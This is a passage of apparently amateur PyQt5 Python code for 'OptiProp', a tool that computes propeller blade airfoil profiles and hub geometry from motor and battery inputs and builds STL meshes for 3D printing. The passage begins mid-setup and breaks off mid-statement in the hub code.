self.spinBoxL = QtWidgets.QSpinBox(self.widget)\r\n self.spinBoxL.setMinimum(20)\r\n self.spinBoxL.setMaximum(1000)\r\n 
self.spinBoxL.setSingleStep(10)\r\n self.spinBoxL.setProperty(\"value\", 100)\r\n self.spinBoxL.setObjectName(\"spinBoxL\")\r\n self.spinBoxL.setToolTip(\"Length of one propeller blade, whole propeller is double the size.\")\r\n self.formLayout.setWidget(1, QtWidgets.QFormLayout.FieldRole, self.spinBoxL)\r\n \r\n self.labelLg = QtWidgets.QLabel(self.widget)\r\n self.labelLg.setObjectName(\"labelLg\")\r\n self.formLayout.setWidget(2, QtWidgets.QFormLayout.LabelRole, self.labelLg)\r\n \r\n self.spinBoxLg = QtWidgets.QSpinBox(self.widget)\r\n self.spinBoxLg.setMaximum(1000)\r\n self.spinBoxLg.setProperty(\"value\", 10)\r\n self.spinBoxLg.setObjectName(\"spinBoxLg\")\r\n \r\n self.formLayout.setWidget(2, QtWidgets.QFormLayout.FieldRole, self.spinBoxLg)\r\n \r\n self.labelKv = QtWidgets.QLabel(self.widget)\r\n self.labelKv.setObjectName(\"labelKv\")\r\n self.formLayout.setWidget(3, QtWidgets.QFormLayout.LabelRole, self.labelKv)\r\n \r\n self.spinBoxKv = QtWidgets.QSpinBox(self.widget)\r\n self.spinBoxKv.setMinimum(100)\r\n self.spinBoxKv.setMaximum(10000)\r\n self.spinBoxKv.setSingleStep(100)\r\n self.spinBoxKv.setProperty(\"value\", 2200)\r\n self.spinBoxKv.setObjectName(\"spinBoxKv\")\r\n self.formLayout.setWidget(3, QtWidgets.QFormLayout.FieldRole, self.spinBoxKv)\r\n \r\n self.labelU = QtWidgets.QLabel(self.widget)\r\n self.labelU.setObjectName(\"labelU\")\r\n self.formLayout.setWidget(4, QtWidgets.QFormLayout.LabelRole, self.labelU)\r\n \r\n self.spinBoxU = QtWidgets.QDoubleSpinBox(self.widget)\r\n self.spinBoxU.setDecimals(1)\r\n self.spinBoxU.setMinimum(1.0)\r\n self.spinBoxU.setMaximum(100.0)\r\n self.spinBoxU.setSingleStep(3.7)\r\n self.spinBoxU.setProperty(\"value\", 11.1)\r\n self.spinBoxU.setObjectName(\"spinBoxU\")\r\n self.formLayout.setWidget(4, QtWidgets.QFormLayout.FieldRole, self.spinBoxU)\r\n \r\n self.labelA = QtWidgets.QLabel(self.widget)\r\n self.labelA.setObjectName(\"labelA\")\r\n self.formLayout.setWidget(5, QtWidgets.QFormLayout.LabelRole, self.labelA)\r\n \r\n self.spinBoxA = QtWidgets.QDoubleSpinBox(self.widget)\r\n self.spinBoxA.setDecimals(1)\r\n self.spinBoxA.setMinimum(1.0)\r\n self.spinBoxA.setMaximum(20.0)\r\n self.spinBoxA.setProperty(\"value\", 5.0)\r\n self.spinBoxA.setObjectName(\"spinBoxA\")\r\n self.formLayout.setWidget(5, QtWidgets.QFormLayout.FieldRole, self.spinBoxA)\r\n \r\n self.widget1 = QtWidgets.QWidget(self.centralwidget)\r\n self.widget1.setGeometry(QtCore.QRect(270, 40, 701, 400))\r\n self.widget1.setObjectName(\"widget1\")\r\n \r\n self.gridLayout = QtWidgets.QGridLayout(self.widget1)\r\n self.gridLayout.setSizeConstraint(QtWidgets.QLayout.SetNoConstraint)\r\n self.gridLayout.setContentsMargins(0, 0, 0, 0)\r\n self.gridLayout.setObjectName(\"gridLayout\")\r\n \r\n self.widget2 = QtWidgets.QWidget(self.widget1)\r\n self.widget2.setObjectName(\"widget2\")\r\n \r\n self.gridLayout.addWidget(self.widget2, 0, 0, 1, 1)\r\n \r\n self.widget_2 = QtWidgets.QWidget(self.widget1)\r\n self.widget_2.setObjectName(\"widget_2\")\r\n \r\n self.bild = vpl.QtFigure(\"bild\")\r\n self.gridLayout.addWidget(self.bild, 0, 0, 1, 1)\r\n \r\n MainWindow.setCentralWidget(self.centralwidget)\r\n self.menubar = QtWidgets.QMenuBar(MainWindow)\r\n self.menubar.setGeometry(QtCore.QRect(0, 0, 1011, 21))\r\n self.menubar.setObjectName(\"menubar\")\r\n MainWindow.setMenuBar(self.menubar)\r\n \r\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\r\n self.statusbar.setObjectName(\"statusbar\")\r\n MainWindow.setStatusBar(self.statusbar)\r\n \r\n self.labelX = 
QtWidgets.QLabel(MainWindow)\r\n self.labelX.setGeometry(QtCore.QRect(520, 442, 300, 16))\r\n self.labelX.setObjectName(\"labelX\")\r\n \r\n self.labelPath = QtWidgets.QLabel(MainWindow)\r\n self.labelPath.setGeometry(QtCore.QRect(200, 442, 300, 16))\r\n self.labelPath.setObjectName(\"labelPath\")\r\n self.labelPath.setStyleSheet(\"background-color: white; border: 1px inset grey;\")\r\n \r\n self.table = QtWidgets.QTableWidget(MainWindow)\r\n self.table.setGeometry(QtCore.QRect(20, 240, 246, 192))\r\n \r\n self.checkBox = QtWidgets.QCheckBox(self.centralwidget)\r\n self.checkBox.setGeometry(QtCore.QRect(30, 440, 141, 17))\r\n self.checkBox.setObjectName(\"checkBox\")\r\n self.checkBox.stateChanged.connect(self.AdvancedOptions)\r\n \r\n self.label_Warning = QtWidgets.QLabel(self.centralwidget)\r\n self.label_Warning.setObjectName(\"lable_Warning\")\r\n self.label_Warning.setGeometry(30, 465, 200, 20)\r\n \r\n self.widget1 = QtWidgets.QWidget(self.centralwidget)\r\n self.widget1.setGeometry(QtCore.QRect(30, 480, 486, 138))\r\n self.widget1.setObjectName(\"widget1\")\r\n \r\n self.gridLayout1 = QtWidgets.QGridLayout(self.widget1)\r\n self.gridLayout1.setContentsMargins(0, 0, 0, 0)\r\n self.gridLayout1.setObjectName(\"gridLayout1\")\r\n \r\n self.label_k = QtWidgets.QLabel(self.widget1)\r\n self.label_k.setObjectName(\"label_k\")\r\n self.gridLayout1.addWidget(self.label_k, 3, 0, 1, 1)\r\n \r\n self.labelPropkonst = QtWidgets.QLabel(self.widget1)\r\n self.labelPropkonst.setObjectName(\"labelPropkonst\")\r\n self.gridLayout1.addWidget(self.labelPropkonst, 0, 0, 1, 2)\r\n \r\n self.label_n = QtWidgets.QLabel(self.widget)\r\n self.label_n.setObjectName(\"label_n\")\r\n self.gridLayout1.addWidget(self.label_n, 4, 0, 1, 1)\r\n \r\n self.lineEdit_8 = QtWidgets.QLineEdit(self.widget1)\r\n self.lineEdit_8.setStatusTip(\"\")\r\n self.lineEdit_8.setObjectName(\"lineEdit_8\")\r\n self.gridLayout1.addWidget(self.lineEdit_8, 3, 3, 1, 1)\r\n \r\n self.lineEdit_XXXXX = QtWidgets.QLabel(self.widget1)\r\n self.lineEdit_XXXXX.setStatusTip(\"\")\r\n self.lineEdit_XXXXX.setObjectName(\"lineEdit_XXXXX\")\r\n self.gridLayout1.addWidget(self.lineEdit_XXXXX, 4, 3, 1, 1)\r\n \r\n self.label_d = QtWidgets.QLabel(self.widget1)\r\n self.label_d.setObjectName(\"label_d\")\r\n self.gridLayout1.addWidget(self.label_d, 2, 0, 1, 1)\r\n \r\n self.lineEdit_6 = QtWidgets.QLineEdit(self.widget1)\r\n self.lineEdit_6.setStatusTip(\"\")\r\n self.lineEdit_6.setObjectName(\"lineEdit_6\")\r\n self.gridLayout1.addWidget(self.lineEdit_6, 2, 3, 1, 1)\r\n \r\n self.label_XXXXX = QtWidgets.QLabel(self.widget1)\r\n self.label_XXXXX.setObjectName(\"label_XXXXX\")\r\n self.gridLayout1.addWidget(self.label_XXXXX, 4, 2, 1, 1)\r\n \r\n self.label_RingAu = QtWidgets.QLabel(self.widget1)\r\n self.label_RingAu.setObjectName(\"label_RingAu\")\r\n self.gridLayout1.addWidget(self.label_RingAu, 2, 2, 1, 1)\r\n \r\n self.lineEdit = QtWidgets.QLineEdit(self.widget1)\r\n self.lineEdit.setStatusTip(\"\")\r\n self.lineEdit.setObjectName(\"lineEdit\")\r\n self.gridLayout1.addWidget(self.lineEdit, 1, 1, 1, 1)\r\n \r\n self.label_RingAb = QtWidgets.QLabel(self.widget1)\r\n self.label_RingAb.setObjectName(\"label_RingAb\")\r\n self.gridLayout1.addWidget(self.label_RingAb, 3, 2, 1, 1)\r\n \r\n self.lineEdit_In = QtWidgets.QLineEdit(self.widget1)\r\n self.lineEdit_In.setStatusTip(\"\")\r\n self.lineEdit_In.setObjectName(\"lineEdit_In\")\r\n self.gridLayout1.addWidget(self.lineEdit_In, 1, 3, 1, 1)\r\n \r\n self.label_c = QtWidgets.QLabel(self.widget1)\r\n 
self.label_c.setObjectName(\"label_c\")\r\n self.gridLayout1.addWidget(self.label_c, 1, 0, 1, 1)\r\n \r\n self.lineEdit_d = QtWidgets.QLineEdit(self.widget1)\r\n self.lineEdit_d.setStatusTip(\"\")\r\n self.lineEdit_d.setObjectName(\"lineEdit_d\")\r\n self.gridLayout1.addWidget(self.lineEdit_d, 2, 1, 1, 1)\r\n \r\n self.lineEdit_k = QtWidgets.QLineEdit(self.widget1)\r\n self.lineEdit_k.setStatusTip(\"\")\r\n self.lineEdit_k.setObjectName(\"lineEdit_k\")\r\n self.gridLayout1.addWidget(self.lineEdit_k, 3, 1, 1, 1)\r\n \r\n self.lineEdit_n = QtWidgets.QLineEdit(self.widget1)\r\n self.lineEdit_n.setStatusTip(\"\")\r\n self.lineEdit_n.setObjectName(\"lineEdit_n\")\r\n self.gridLayout1.addWidget(self.lineEdit_n, 4, 1, 1, 1)\r\n \r\n self.label_RingIn = QtWidgets.QLabel(self.widget1)\r\n self.label_RingIn.setObjectName(\"label_RingIn\")\r\n self.gridLayout1.addWidget(self.label_RingIn, 1, 2, 1, 1)\r\n \r\n self.labelHUb = QtWidgets.QLabel(self.widget1)\r\n self.labelHUb.setObjectName(\"labelHUb\")\r\n self.gridLayout1.addWidget(self.labelHUb, 0, 2, 1, 3)\r\n \r\n \r\n \r\n self.retranslateUi(MainWindow)\r\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\r\n self.pushButtonGenerate.clicked.connect(self.Code)\r\n self.pushButtonExport.clicked.connect(self.Export)\r\n self.pushButtonDialog.clicked.connect(self.Dialog)\r\n \r\n self.Code()\r\n self.path = expanduser(\"~\")+'\\Documents'\r\n \r\n \r\n \r\n def retranslateUi(self, MainWindow):\r\n _translate = QtCore.QCoreApplication.translate\r\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"OptiProp v0.4\"))\r\n self.pushButtonGenerate.setText(_translate(\"MainWindow\", \"Generate\"))\r\n self.pushButtonDialog.setText(_translate(\"MainWindow\", \"...\"))\r\n self.pushButtonExport.setText(_translate(\"MainWindow\", \"Export\"))\r\n self.labelPropellerVariablen.setText(_translate(\"MainWindow\", \"Propeller variables:\"))\r\n self.labelL.setText(_translate(\"MainWindow\", \"Propeller length in mm:\"))\r\n self.labelLg.setText(_translate(\"MainWindow\", \"Draft velocity in m/s:\"))\r\n self.labelKv.setText(_translate(\"MainWindow\", \"Motor Kv:\"))\r\n self.labelU.setText(_translate(\"MainWindow\", \"Battery voltage in V:\"))\r\n self.labelA.setText(_translate(\"MainWindow\", \"Axis diameter in mm:\"))\r\n self.labelPath.setText(_translate(\"MainWindow\", \"Export path: \"+expanduser(\"~\")+'\\Documents'))\r\n self.spinBoxLg.setToolTip(\"This is the air speed that hits the propeller in the Flight direction. It consists of the flight speed and the pulled air from the propullsion \")\r\n self.spinBoxL.setToolTip(\"Length of one propeller blade, whole propeller is double the size.\")\r\n self.spinBoxKv.setToolTip(\"The motor kv rating, for rpm calculations\")\r\n self.spinBoxU.setToolTip(\"The battery voltage. In 3.7V increments\")\r\n self.spinBoxA.setToolTip(\"Diameter of the Hole for the motor shaft. The hole is 0.8 mm larger for 3D print tolerance\")\r\n self.label_Warning.setText(_translate(\"Mainwindow\",\"Warning! 
Only for experienced users\"))\r\n self.checkBox.setText(_translate(\"MainWindow\", \"Advanced options\"))\r\n self.label_k.setText(_translate(\"MainWindow\", \"k =\"))\r\n self.labelPropkonst.setText(_translate(\"MainWindow\", \"Propeller settings:\"))\r\n self.label_n.setText(_translate(\"MainWindow\", \"n = \"))\r\n self.lineEdit_8.setText(_translate(\"MainWindow\", \"0.8\"))\r\n \r\n self.lineEdit_XXXXX.setText(_translate(\"MainWindow\", \"\"))\r\n self.label_d.setText(_translate(\"MainWindow\", \"d =\"))\r\n self.lineEdit_6.setText(_translate(\"MainWindow\", \"2.5\"))\r\n self.label_XXXXX.setText(_translate(\"MainWindow\", \"\"))\r\n self.lineEdit_6.setToolTip(_translate(\"MainWindow\", \"in mm\"))\r\n self.lineEdit_In.setToolTip(_translate(\"MainWindow\", \"in mm\"))\r\n self.lineEdit_8.setToolTip(_translate(\"MainWindow\", \"in mm\"))\r\n self.label_RingAu.setText(_translate(\"MainWindow\", \"Hub outer ring thicknes:\"))\r\n self.lineEdit.setToolTip(_translate(\"MainWindow\", \"Maximum width of the propellers. In proportion to Length. Number is divided by one (if c = k then the propeller is straight)\"))\r\n self.lineEdit.setText(_translate(\"MainWindow\", \"6\"))\r\n self.label_RingAb.setText(_translate(\"MainWindow\", \"Ring spacing:\"))\r\n self.lineEdit_In.setText(_translate(\"MainWindow\", \"1.6\"))\r\n self.label_c.setText(_translate(\"MainWindow\", \"c = \"))\r\n self.lineEdit_d.setToolTip(_translate(\"MainWindow\", \"Distance to widest point. In proportion to Length. Number is divided by one \"))\r\n self.lineEdit_d.setText(_translate(\"MainWindow\", \"3\"))\r\n self.lineEdit_k.setToolTip(_translate(\"MainWindow\", \"Minimum width of the propeller. In proportion to Length. Number is divided by one (if c = k then the propeller is straight)\"))\r\n self.lineEdit_k.setText(_translate(\"MainWindow\", \"20\"))\r\n self.lineEdit_n.setToolTip(_translate(\"MainWindow\", \"Number of profiles. 
Higher Number means more precise 3D model\"))\r\n self.lineEdit_n.setText(_translate(\"MainWindow\", \"20\"))\r\n self.label_RingIn.setText(_translate(\"MainWindow\", \"Hub inner ring thicknes:\"))\r\n self.labelHUb.setText(_translate(\"MainWindow\", \"Propeller hub settings:\"))\r\n \r\n \r\n def AdvancedOptions(self):\r\n \r\n if self.checkBox.isChecked() == True:\r\n MainWindow.setFixedSize(1011, 640)\r\n if self.checkBox.isChecked() == False:\r\n MainWindow.setFixedSize(1011,480)\r\n \r\n \r\n def Dialog(self):\r\n options = QFileDialog.Options()\r\n options |= QFileDialog.DontUseNativeDialog\r\n options |= QFileDialog.DontUseCustomDirectoryIcons\r\n dialog = QFileDialog()\r\n dialog.setOptions(options)\r\n \r\n dialog.setFilter(dialog.filter() | QtCore.QDir.Hidden)\r\n \r\n # ARE WE TALKING ABOUT FILES OR FOLDERS\r\n \r\n dialog.setFileMode(QFileDialog.DirectoryOnly)\r\n \r\n # OPENING OR SAVING\r\n dialog.setAcceptMode(QFileDialog.AcceptOpen) #if forOpen else dialog.setAcceptMode(QFileDialog.AcceptSave)\r\n \r\n \r\n \r\n \r\n \r\n dialog.setDirectory(expanduser(\"~\")+'\\Documents')\r\n \r\n \r\n \r\n if dialog.exec_() == QDialog.Accepted:\r\n self.path = dialog.selectedFiles()[0] # returns a list\r\n self.labelPath.setText(\"Export path: \"+self.path)\r\n return self.path\r\n else:\r\n return expanduser(\"~\")+'\\Documents' \r\n \r\n \r\n \r\n \r\n \r\n def Code(self):\r\n \r\n # -*- coding: utf-8 -*-\r\n \"\"\"\r\n Created on Mon Mar 30 12:47:12 2020\r\n \r\n @author: Kai Jungsthöfel & Lars Schröder\r\n \"\"\"\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n # Variablen:\r\n \r\n L = float(self.spinBoxL.value()) # in mm #Propeller Länge\r\n self.L = L\r\n LGeschwindigkeit = float(self.spinBoxLg.value()) # in m/s #Luftzug Geschwindikeit\r\n self.LGeschwindigkeit = LGeschwindigkeit\r\n Kv = float(self.spinBoxKv.value()) # Kv #Kv rating Motor\r\n self.Kv = Kv\r\n V = float(self.spinBoxU.value()) # Volt #Batterie\r\n self.V = V\r\n Achse = float(self.spinBoxA.value()) +0.8 #in mm #Achsen größe + Sicherheitsabstand # Standard = 5\r\n self.Achse = Achse\r\n \r\n \r\n \r\n # Konstanten\r\n c = 1/float(self.lineEdit.text()) # Maximalbreite des Propellers\r\n d = 1 / float(self.lineEdit_d.text()) # Entfernung des breitesten Punkt\r\n k = 1 / float(self.lineEdit_k.text()) # Minimalbreite des Propellers\r\n n = int(self.lineEdit_n.text()) # Anzahl der Profilflächen\r\n x = L / n # Profil Abstand\r\n Alpha = 7 # Optimalwinkel\r\n #Hub Konstanten\r\n InnerRingBreite = float(self.lineEdit_In.text())\r\n RingbreiteAussen = float(self.lineEdit_6.text())\r\n Ringabstand = float(self.lineEdit_8.text())\r\n \r\n \r\n Gamma = []\r\n v = []\r\n B = []\r\n \r\n \r\n rps = Kv * V\r\n \r\n # Profilgeschwindikeits Liste\r\n for i in range(n+1):\r\n v[i] = v.append(0)\r\n Gamma[i] = Gamma.append(0)\r\n B[i] = B.append(0)\r\n \r\n for i in range(1, n+1):\r\n # Profilgeschwindikeit Rechnung\r\n v[i] = 2 * math.pi * (rps / 60) * ((x / 1000) * i)\r\n \r\n # Winkel\r\n Gamma[i] = -math.radians(math.degrees(math.atan(LGeschwindigkeit / v[i])) + Alpha)\r\n \r\n # Profilbreite\r\n B[i] = ((k * L - c * L) / (L - d * L) ** 2 * (x * (i + 1) - d * L) ** 2 + c * L)\r\n \r\n \r\n \r\n p = 0\r\n clear = 1 #Abstand vom hub bis zum anfang des Propellers in Profilflächen n\r\n for i in range(n):\r\n if (x*i) >= (Achse/2 + RingbreiteAussen +InnerRingBreite +2):\r\n if p == 0:\r\n p = 1\r\n clear = i \r\n \r\n #////// UI \\\\\\\\\\\\\\\r\n UI = []\r\n for i in range(clear, n+1):\r\n 
UI.append([int(v[i]),round(math.degrees(Gamma[i])*(-1),2)])\r\n \r\n self.UI = UI\r\n self.labelX.setText(\"\")\r\n \r\n \r\n \r\n \r\n # Standard Airfoil\r\n X = [\r\n 0, 0.0005, 0.001, 0.002, 0.004, 0.008, 0.012, 0.02, 0.03, 0.04, 0.05, 0.06, 0.08, 0.1, 0.12, 0.14, 0.16,\r\n 0.18, 0.2, 0.22, 0.24, 0.26, 0.28, 0.3, 0.32, 0.34, 0.36, 0.38, 0.40, 0.42, 0.44, 0.46, 0.48, 0.5, 0.52,\r\n 0.54, 0.56, 0.58, 0.6, 0.62, 0.64, 0.66, 0.68, 0.7, 0.72, 0.74, 0.76, 0.78, 0.8, 0.82, 0.84, 0.86, 0.88,\r\n 0.9, 0.92, 0.94, 0.96, 0.97, 0.98, 0.99, 1\r\n ]\r\n \r\n YO = [\r\n 0, 0.0023390, 0.0037271, 0.0058025, 0.0089238, 0.0137350, 0.0178581, 0.0253735, 0.0330215, 0.0391283,\r\n 0.0442753, 0.0487571, 0.0564308, 0.0629981, 0.0686204, 0.0734360, 0.0775707, 0.0810687, 0.0839202,\r\n 0.0861433, 0.0878308, 0.0890840, 0.0900016, 0.0906804, 0.0911857, 0.0915079, 0.0916266, 0.0915212,\r\n 0.0911712, 0.0905657, 0.0897175, 0.0886427, 0.0873572, 0.0858772, 0.0842145, 0.0823712, 0.0803480,\r\n 0.0781451, 0.0757633, 0.0732055, 0.0704822, 0.0676046, 0.0645843, 0.0614329, 0.0581599, 0.0547675,\r\n 0.0512565, 0.0476281, 0.0438836, 0.0400245, 0.0360536, 0.0319740, 0.0277891, 0.0235025, 0.0191156,\r\n 0.0146239, 0.0100232, 0.0076868, 0.0053335, 0.0029690, 0\r\n ]\r\n \r\n YU = [\r\n 0, -.0046700, -.0059418, -.0078113, -.0105126, -.0142862, -.0169733, -.0202723, -.0226056, -.0245211,\r\n -.0260452, -.0271277, -.0284595, -.0293786, -.0299633, -.0302404, -.0302404, -.0300490, -.0296656,\r\n -.0296656, -.0285181, -.0278164, -.0270696, -.0263079, -.0255565, -.0248176, -.0240870, -.0233606,\r\n -.0226341, -.0219042, -.0211708, -.0204353, -.0196986, -.0189619, -.0182262, -.0174914, -.0167572,\r\n -.0160232, -.0152893, -.0145551, -.0138207, -.0130862, -.0123515, -.0116169, -.0108823, -.0101478,\r\n -.0094133, -.0086788, -.0079443, -.0072098, -.0064753, -.0057408, -.0050063, -.0042718, -.0035373,\r\n -.0028028, -.0020683, -.0017011, -.0013339, -.0009666, 0\r\n ]\r\n \r\n \r\n #Sekundäre Koordinatenliste\r\n XO2 = []\r\n XO3 = []\r\n for i in range(len(X)):\r\n XO2[i] = XO2.append(0)\r\n XO3[i] = XO3.append(0)\r\n \r\n XU2 = []\r\n XU3 = []\r\n for i in range(len(X)):\r\n XU2[i] = XU2.append(0)\r\n XU3[i] = XU3.append(0)\r\n \r\n \r\n YO2 = []\r\n YO3 = []\r\n for i in range(len(YO)):\r\n YO2[i] = YO2.append(0)\r\n YO3[i] = YO3.append(0)\r\n \r\n YU2 = []\r\n YU3 = []\r\n for i in range(len(YU)):\r\n YU2[i] = YU2.append(0)\r\n YU3[i] = YU3.append(0)\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n # Die Reihenfolge der Kordinaten Wird Definiert um zwei Profile mit einander zu Verbinden\r\n Eckfolge = []\r\n f = 0\r\n for i in range(len(X)*4):\r\n if i % 2 == 0:\r\n Eckfolge.append([0+f+(len(X)*2),1+f,0+f])\r\n else:\r\n Eckfolge.append([0+f+(len(X)*2),1+f+(len(X)*2),1+f])\r\n f += 1\r\n \r\n Eckfolge[-1].insert(2,0)\r\n Eckfolge[-1].remove(244)\r\n \r\n \r\n \r\n \r\n \r\n Propeller = []\r\n \r\n KordC = []\r\n \r\n \r\n \r\n for p in range(1,n): #standard = (1,n)\r\n \r\n \r\n Kord = [] #Kord wird Erstellt bzw. 
Alle kordinaten werden bei jedem p Gelöscht.\r\n \r\n # Koordinaten Skalieren und in die Zweittabellen Übertragen\r\n for i in range(len(X)):\r\n XO2[i] = (X[i] * math.cos(Gamma[p]) - YO[i] * math.sin(Gamma[p])) * B[p]\r\n if p <= n-1:\r\n XO3[i] = (X[i] * math.cos(Gamma[p+1]) - YO[i] * math.sin(Gamma[p+1])) * B[p+1]\r\n for i in range(len(X)):\r\n XU2[i] = (X[i] * math.cos(Gamma[p]) - YU[i] * math.sin(Gamma[p])) * B[p]\r\n if p <= n-1:\r\n XU3[i] = (X[i] * math.cos(Gamma[p+1]) - YU[i] * math.sin(Gamma[p+1])) * B[p+1]\r\n \r\n for i in range(len(YO)):\r\n YO2[i] = (X[i] * math.sin(Gamma[p]) + YO[i] * math.cos(Gamma[p])) * B[p]\r\n if p <= n-1:\r\n YO3[i] = (X[i] * math.sin(Gamma[p+1]) + YO[i] * math.cos(Gamma[p+1])) * B[p+1]\r\n for i in range(len(YU)):\r\n YU2[i] = (X[i] * math.sin(Gamma[p]) + YU[i] * math.cos(Gamma[p])) * B[p]\r\n if p <= n-1:\r\n YU3[i] = (X[i] * math.sin(Gamma[p+1]) + YU[i] * math.cos(Gamma[p+1])) * B[p+1]\r\n \r\n \r\n for i in range(len(X)):\r\n \r\n #Kordinaten Array für Numpy-STL für ein Profil \r\n # [[x,y,z]\r\n # [x,y,z]...]\r\n \r\n xk = XO2[i]\r\n yk = YO2[i]\r\n zk = x*(p)\r\n \r\n Kordin = [zk,xk,yk] \r\n Kord.append(Kordin)\r\n \r\n \r\n XU2.reverse() #Damit die Koordinaten im Kreis um die airfoil gehen werden die Unteren Listen Rückwärts abglesen.\r\n YU2.reverse()\r\n for i in range(len(X)):\r\n xk = XU2[i]\r\n yk = YU2[i]\r\n zk = x*(p)\r\n \r\n Kordin = [zk,xk,yk]\r\n Kord.append(Kordin)\r\n \r\n if p == clear+1: #2tes Profil Speichen zum Verpinden mit dem Hub\r\n KordC = Kord\r\n for i in range(len(X)): \r\n # Es werden zwei Profile benötigt um Dreiecke zu bilden. Das Zweite Profil muss noch erstellt werden und in die gleiche liste hinter dem Ersten Profil Geschrieben werden.\r\n xk = XO3[i]\r\n yk = YO3[i]\r\n zk = x*(p+1)\r\n \r\n Kordin = [zk,xk,yk]\r\n Kord.append(Kordin)\r\n \r\n \r\n XU3.reverse() #Damit die Koordinaten im Kreis um die airfoil gehen werden die Unteren Listen Rückwärts abglesen.\r\n YU3.reverse()\r\n for i in range(len(X)):\r\n xk = XU3[i]\r\n yk = YU3[i]\r\n zk = x*(p+1)\r\n \r\n Kord.append([zk,xk,yk])\r\n \r\n \r\n \r\n \r\n \r\n if p <= n-1 and p > clear:\r\n DoppelProfilHulle = mesh.Mesh(np.zeros(np.array(Eckfolge).shape[0], dtype=mesh.Mesh.dtype))\r\n for i, f in enumerate(Eckfolge):\r\n for j in range(3):\r\n DoppelProfilHulle.vectors[i][j] = np.array(Kord)[f[j],:]\r\n Propeller.append(DoppelProfilHulle.data)\r\n \r\n \r\n #//////End Schließung\\\\\\\\\\\\\\\r\n Eckfolge = []\r\n f = len(X)*2 #Halb so größe eckfolge da nur ein Profil untereinander Verbunden wird\r\n for i in range(len(X)*2):\r\n if i % 2 == 0:\r\n Eckfolge.append([0-f+(len(X)*2-1),1+f,0+f])\r\n else:\r\n Eckfolge.append([1+f,1-f+(len(X)*2-2),0-f+(len(X)*2-2)])\r\n f += 1\r\n \r\n DoppelProfilHulle = mesh.Mesh(np.zeros(np.array(Eckfolge).shape[0], dtype=mesh.Mesh.dtype))\r\n for i, f in enumerate(Eckfolge):\r\n for j in range(3):\r\n DoppelProfilHulle.vectors[i][j] = np.array(Kord)[f[j],:]\r\n Propeller.append(DoppelProfilHulle.data)\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n #////// HUB \\\\\\\\\\\\\\#\r\n \r\n #HubOffset\r\n xO = 0\r\n yO = (Achse/2)+InnerRingBreite+RingbreiteAussen\r\n zO = -3\r\n \r\n \r\n #///// Innerer Kreis \\\\\\\\\\\r\n \r\n Achse2 = 0\r\n HubTopIn = []\r\n HubBottomIn = []\r\n HubRimTop = []\r\n HubRimBottom = []\r\n for i in range(19): #Koordinaten Liste für Oberen und Unteren Halbkreis\r\n i -= 4\r\n i = i*10\r\n \r\n HubTopIn.append( [math.cos(math.radians(i))*(Achse/2)+xO, math.sin(math.radians(i))*(Achse/2)+yO, 
5+zO])\r\n \r\n HubBottomIn.append( [math.cos(math.radians(i))*(Achse/2)+xO, math.sin(math.radians(i))*(Achse/2)+yO, -5+zO])\r\n \r\n Achse2 = Achse + InnerRingBreite*2 \r\n for i in range(19): # Umgedrehtehälfte der Kordinaten liste\r\n p = 140-i*10\r\n \r\n HubTopIn.append( [math.cos(math.radians(p))*(Achse2/2)+xO, math.sin(math.radians(p))*(Achse2/2)+yO, 5+zO])\r\n \r\n HubBottomIn.append( [math.cos(math.radians(p))*(Achse2/2)+xO, math.sin(math.radians(p))*(Achse2/2)+yO, -5+zO])\r\n if p <= 100: #Koordinaten liste für den Oberen und Unteren Rand\r\n HubRimTop.append( [math.cos(math.radians(p))*(Achse2/2)+xO, math.sin(math.radians(p))*(Achse2/2)+yO, 5+zO]) \r\n HubRimBottom.append([math.cos(math.radians(p))*(Achse2/2)+xO, math.sin(math.radians(p))*(Achse2/2)+yO, -5+zO])\r\n \r\n \r\n Eckfolge = [] #Eckfolge für Oberen Halbkreis\r\n f = 0 \r\n for i in range(18*2):\r\n if i % 2 == 0:\r\n Eckfolge.append([0-f+(18*2),1+f,0+f])\r\n else:\r\n Eckfolge.append([0+f,1-f+(18*2),0-f+(18*2)])\r\n f += 1\r\n \r\n \r\n Hub = []\r\n \r\n # Unteren und Oberen Halbkreis Erstellen \r\n Hubmesh = mesh.Mesh(np.zeros(np.array(Eckfolge).shape[0], dtype=mesh.Mesh.dtype))\r\n for i, f in enumerate(Eckfolge):\r\n for j in range(3):\r\n Hubmesh.vectors[i][j] = np.array(HubTopIn)[f[j],:]\r\n \r\n Eckfolge = [] #Eckfolge für Unteren Halbkreis\r\n f = 0 \r\n for i in range(18*2):\r\n if i % 2 == 0:\r\n Eckfolge.append([0+f,1+f,0-f+(18*2)])\r\n else:\r\n Eckfolge.append([0-f+(18*2),1-f+(18*2),0+f])\r\n f += 1\r\n \r\n Hub.append(Hubmesh.data)\r\n Hubmesh = mesh.Mesh(np.zeros(np.array(Eckfolge).shape[0], dtype=mesh.Mesh.dtype))\r\n for i, f in enumerate(Eckfolge):\r\n for j in range(3):\r\n Hubmesh.vectors[i][j] = np.array(HubBottomIn)[f[j],:] \r\n Hub.append(Hubmesh.data)\r\n \r\n \r\n # Koordinaten liste aus der Ober und Unterhälfte für die Hülle\r\n HubTopIn.reverse() #HubTop wird umgedreht eingesetzt\r\n \r\n HubCompleteIn = HubBottomIn+ HubTopIn\r\n \r\n \r\n \r\n #Eckfolge für die Hülle\r\n Eckfolge = []\r\n f = 0 \r\n for i in range(18*2+12):\r\n if i % 2 == 0:\r\n Eckfolge.append([2-f+(18*4),1+f,0+f])\r\n else:\r\n Eckfolge.append([0+f,3-f+(18*4),2-f+(18*4)])\r\n f += 1\r\n # Zum Schließen der Form \r\n Eckfolge.append([0,38,75])\r\n Eckfolge.append([0,37,38])\r\n \r\n # Körper wird Erstellt \r\n Hubmesh = mesh.Mesh(np.zeros(np.array(Eckfolge).shape[0], dtype=mesh.Mesh.dtype))\r\n for i, f in enumerate(Eckfolge):\r\n for j in range(3):\r\n Hubmesh.vectors[i][j] = np.array(HubCompleteIn)[f[j],:] \r\n Hub.append(Hubmesh.data) \r\n \r\n \r\n \r\n \r\n \r\n \r\n #//// Äußere Kreis \\\\\\\\\\\\\r\n HubRimTop.reverse()\r\n HubRimBottom.reverse()\r\n HubTop = []\r\n HubBottom = []\r\n for i in range(19): #Koordinaten Liste für Oberen und Unteren Halbkreis\r\n i -= 9\r\n i = i*10\r\n \r\n HubTop.append( 